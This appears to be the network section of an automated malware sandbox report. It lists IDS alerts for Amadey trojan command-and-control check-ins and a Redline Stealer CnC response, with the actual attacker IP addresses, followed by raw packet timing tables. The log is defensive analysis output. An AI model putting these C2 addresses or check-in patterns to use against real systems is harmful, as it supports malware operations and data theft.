                                                                                                                                                                                    192.168.2.445.32.200.11350538802027700 01/05/23-09:00:39.799573TCP2027700ET TROJAN Amadey CnC Check-In5053880192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950536802027700 01/05/23-09:00:39.437593TCP2027700ET TROJAN Amadey CnC Check-In5053680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950628802027700 01/05/23-09:00:47.622929TCP2027700ET TROJAN Amadey CnC Check-In5062880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950358802027700 01/05/23-09:00:19.577756TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950190802027700 01/05/23-08:59:59.917333TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350762802027700 01/05/23-09:01:02.403608TCP2027700ET TROJAN Amadey CnC Check-In5076280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10949767802027700 01/05/23-08:58:41.873803TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950312802027700 01/05/23-09:00:11.973592TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349931802027700 01/05/23-08:59:16.411802TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950134802027700 01/05/23-08:59:53.519893TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949764802027700 01/05/23-08:58:40.202978TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349891802027700 01/05/23-08:59:11.233677TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950394802027700 01/05/23-09:00:23.445580TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950137802027700 01/05/23-08:59:53.835444TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950783802027700 01/05/23-09:01:04.057520TCP2027700ET TROJAN Amadey CnC Check-In5078380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350120802027700 01/05/23-08:59:52.031927TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350798802027700 01/05/23-09:01:05.181687TCP2027700ET TROJAN Amadey CnC Check-In5079880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950062802027700 01/05/23-08:59:45.186149TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350660802027700 01/05/23-09:00:53.003102TCP2027700ET TROJAN Amadey CnC Check-In5066080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350449802027700 01/05/23-09:00:28.961048TCP2027700ET TROJAN Amadey CnC Check-In5044980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350663802027700 01/05/23-09:00:53.028470TCP2027700ET TROJAN Amadey CnC Check-In5066380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350587802027700 01/05/23-09:00:43.983662TCP2027700ET TROJAN Amadey CnC Check-In5058780192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350818802027700 01/05/23-09:01:06.823327TCP2027700ET TROJAN Amadey CnC Check-In5081880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350522802027700 01/05/23-09:00:38.198566TCP2027700ET TROJAN Amadey CnC Check-In5052280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949840802027700 01/05/23-08:59:02.896850TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350225802027700 01/05/23-09:00:03.459317TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350693802027700 01/05/23-09:00:55.952321TCP2027700ET TROJAN Amadey CnC Check-In5069380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350149802027700 01/05/23-08:59:54.664923TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12349944802027700 01/05/23-08:59:21.558029TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350765802027700 01/05/23-09:01:02.547317TCP2027700ET TROJAN Amadey CnC Check-In5076580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950773802027700 01/05/23-09:01:03.100108TCP2027700ET TROJAN Amadey CnC Check-In5077380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350413802027700 01/05/23-09:00:25.294913TCP2027700ET TROJAN Amadey CnC Check-In5041380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950421802027700 01/05/23-09:00:25.952060TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350426802027700 01/05/23-09:00:26.560374TCP2027700ET TROJAN Amadey CnC Check-In5042680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350502802027700 01/05/23-09:00:36.580372TCP2027700ET TROJAN Amadey CnC Check-In5050280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350719802027700 01/05/23-09:00:58.200718TCP2027700ET TROJAN Amadey CnC Check-In5071980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950249802027700 01/05/23-09:00:05.885679TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350676802027700 01/05/23-09:00:54.155480TCP2027700ET TROJAN Amadey CnC Check-In5067680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950427802027700 01/05/23-09:00:26.496027TCP2027700ET TROJAN Amadey CnC Check-In5042780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349990802027700 01/05/23-08:59:30.202720TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350057802027700 01/05/23-08:59:44.400427TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350518802027700 01/05/23-09:00:37.898419TCP2027700ET TROJAN Amadey CnC Check-In5051880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350512802027700 01/05/23-09:00:37.279985TCP2027700ET TROJAN Amadey CnC Check-In5051280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350423802027700 01/05/23-09:00:26.171588TCP2027700ET TROJAN Amadey CnC Check-In5042380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350607802027700 01/05/23-09:00:45.466559TCP2027700ET TROJAN Amadey CnC Check-In5060780192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949948802027700 01/05/23-08:59:22.544996TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350334802027700 01/05/23-09:00:16.623152TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950704802027700 01/05/23-09:00:56.768115TCP2027700ET TROJAN Amadey CnC Check-In5070480192.168.2.462.204.41.109
                                                                                                                                                                                    62.204.41.109192.168.2.480497402838063 01/05/23-08:58:29.856205TCP2838063ETPRO TROJAN Amadey CnC Server Payload Response (exe)804974062.204.41.109192.168.2.4
                                                                                                                                                                                    192.168.2.445.32.200.11350153802027700 01/05/23-08:59:55.394118TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950348802027700 01/05/23-09:00:18.269120TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350436802027700 01/05/23-09:00:27.455366TCP2027700ET TROJAN Amadey CnC Check-In5043680192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350130802027700 01/05/23-08:59:53.086407TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350245802027700 01/05/23-09:00:05.396067TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950763802027700 01/05/23-09:01:02.368945TCP2027700ET TROJAN Amadey CnC Check-In5076380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950526802027700 01/05/23-09:00:38.476725TCP2027700ET TROJAN Amadey CnC Check-In5052680192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950674802027700 01/05/23-09:00:53.974376TCP2027700ET TROJAN Amadey CnC Check-In5067480192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350242802027700 01/05/23-09:00:05.262014TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350156802027700 01/05/23-08:59:56.232806TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350169802027700 01/05/23-08:59:58.253361TCP2027700ET TROJAN Amadey CnC Check-In5016980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350703802027700 01/05/23-09:00:56.707698TCP2027700ET TROJAN Amadey CnC Check-In5070380192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350420802027700 01/05/23-09:00:26.068591TCP2027700ET TROJAN Amadey CnC Check-In5042080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350788802027700 01/05/23-09:01:04.286381TCP2027700ET TROJAN Amadey CnC Check-In5078880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350439802027700 01/05/23-09:00:27.717664TCP2027700ET TROJAN Amadey CnC Check-In5043980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950055802027700 01/05/23-08:59:44.443723TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950141802027700 01/05/23-08:59:54.090463TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950493802027700 01/05/23-09:00:35.266739TCP2027700ET TROJAN Amadey CnC Check-In5049380192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350140802027700 01/05/23-08:59:54.155578TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950582802027700 01/05/23-09:00:43.434887TCP2027700ET TROJAN Amadey CnC Check-In5058280192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350706802027700 01/05/23-09:00:56.921645TCP2027700ET TROJAN Amadey CnC Check-In5070680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950230802027700 01/05/23-09:00:03.955738TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350390802027700 01/05/23-09:00:23.045637TCP2027700ET TROJAN Amadey CnC Check-In5039080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949849802027700 01/05/23-08:59:04.524670TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10949938802027700 01/05/23-08:59:17.222073TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950671802027700 01/05/23-09:00:53.721447TCP2027700ET TROJAN Amadey CnC Check-In5067180192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.32.200.11350410802027700 01/05/23-09:00:24.986182TCP2027700ET TROJAN Amadey CnC Check-In5041080192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.32.200.11350581802027700 01/05/23-09:00:43.472973TCP2027700ET TROJAN Amadey CnC Check-In5058180192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.462.204.41.10950760802027700 01/05/23-09:01:02.117282TCP2027700ET TROJAN Amadey CnC Check-In5076080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349934802027700 01/05/23-08:59:16.668938TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350054802027700 01/05/23-08:59:44.171627TCP2027700ET TROJAN Amadey CnC Check-In5005480192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950707802027700 01/05/23-09:00:57.044379TCP2027700ET TROJAN Amadey CnC Check-In5070780192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.462.204.41.10950500802027700 01/05/23-09:00:36.283421TCP2027700ET TROJAN Amadey CnC Check-In5050080192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12349848802027700 01/05/23-08:59:04.429913TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10950789802027700 01/05/23-09:01:04.382319TCP2027700ET TROJAN Amadey CnC Check-In5078980192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350492802027700 01/05/23-09:00:35.167092TCP2027700ET TROJAN Amadey CnC Check-In5049280192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350604802027700 01/05/23-09:00:45.256809TCP2027700ET TROJAN Amadey CnC Check-In5060480192.168.2.445.66.230.123
                                                                                                                                                                                    82.115.223.15192.168.2.415486505752850353 01/05/23-09:00:55.252560TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response154865057582.115.223.15192.168.2.4
                                                                                                                                                                                    192.168.2.445.66.230.12350686802027700 01/05/23-09:00:55.257034TCP2027700ET TROJAN Amadey CnC Check-In5068680192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.32.200.11350699802027700 01/05/23-09:00:56.455009TCP2027700ET TROJAN Amadey CnC Check-In5069980192.168.2.445.32.200.113
                                                                                                                                                                                    192.168.2.445.66.230.12350159802027700 01/05/23-08:59:57.268240TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.462.204.41.10949935802027700 01/05/23-08:59:16.871314TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.462.204.41.109
                                                                                                                                                                                    192.168.2.445.66.230.12350248802027700 01/05/23-09:00:05.629233TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12350670802027700 01/05/23-09:00:53.596368TCP2027700ET TROJAN Amadey CnC Check-In5067080192.168.2.445.66.230.123
                                                                                                                                                                                    192.168.2.445.66.230.12349921802027700 01/05/23-08:59:14.725675TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.445.66.230.123
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 5, 2023 08:56:52.889731884 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903096914 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903177977 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903255939 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903345108 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903369904 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903409958 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903466940 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903474092 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903525114 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903538942 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903603077 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903609991 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903664112 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903692961 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903727055 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903772116 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903772116 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903831959 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:52.903887987 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:53.014158964 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:53.026813984 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:53.026875019 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:53.026906967 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:53.026941061 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:53.026971102 CET4434969423.211.6.115192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:53.027117968 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:53.027169943 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:53.264619112 CET49694443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:53.264650106 CET49693443192.168.2.423.211.6.115
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940156937 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940156937 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940248966 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940293074 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940325975 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940352917 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940352917 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940388918 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940388918 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.940407038 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957350016 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957413912 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957503080 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957545996 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957592964 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957634926 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957683086 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957731962 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957781076 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957830906 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957874060 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957918882 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957952976 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.957994938 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958040953 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958084106 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958128929 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958165884 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958209038 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958251953 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958298922 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958338022 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958374977 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958417892 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958453894 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958499908 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958543062 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958586931 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958626032 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958657980 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958712101 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958754063 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958786011 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958822966 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958869934 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958914995 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.958961964 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959008932 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959048033 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959096909 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959141970 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959192038 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959229946 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959270000 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959316969 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959358931 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959404945 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959451914 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959492922 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959525108 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959558010 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959592104 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959635973 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959670067 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959712029 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959748983 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959780931 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959814072 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959810972 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959810972 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959846973 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959878922 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959911108 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959943056 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.959979057 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960011959 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960043907 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960076094 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960108042 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960140944 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960175991 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960208893 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960256100 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960294962 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:56.960328102 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:57.073426008 CET44349686204.79.197.200192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:57.074733973 CET49686443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:56:58.681370974 CET49672443192.168.2.4104.212.67.92
                                                                                                                                                                                    Jan 5, 2023 08:56:59.516046047 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.516114950 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.516244888 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.517489910 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.517538071 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.681575060 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.681746006 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.828677893 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.828717947 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.829279900 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.830676079 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.830708981 CET4434969820.190.159.1192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:56:59.830749035 CET49698443192.168.2.420.190.159.1
                                                                                                                                                                                    Jan 5, 2023 08:56:59.830759048 CET4434969820.190.159.1192.168.2.4
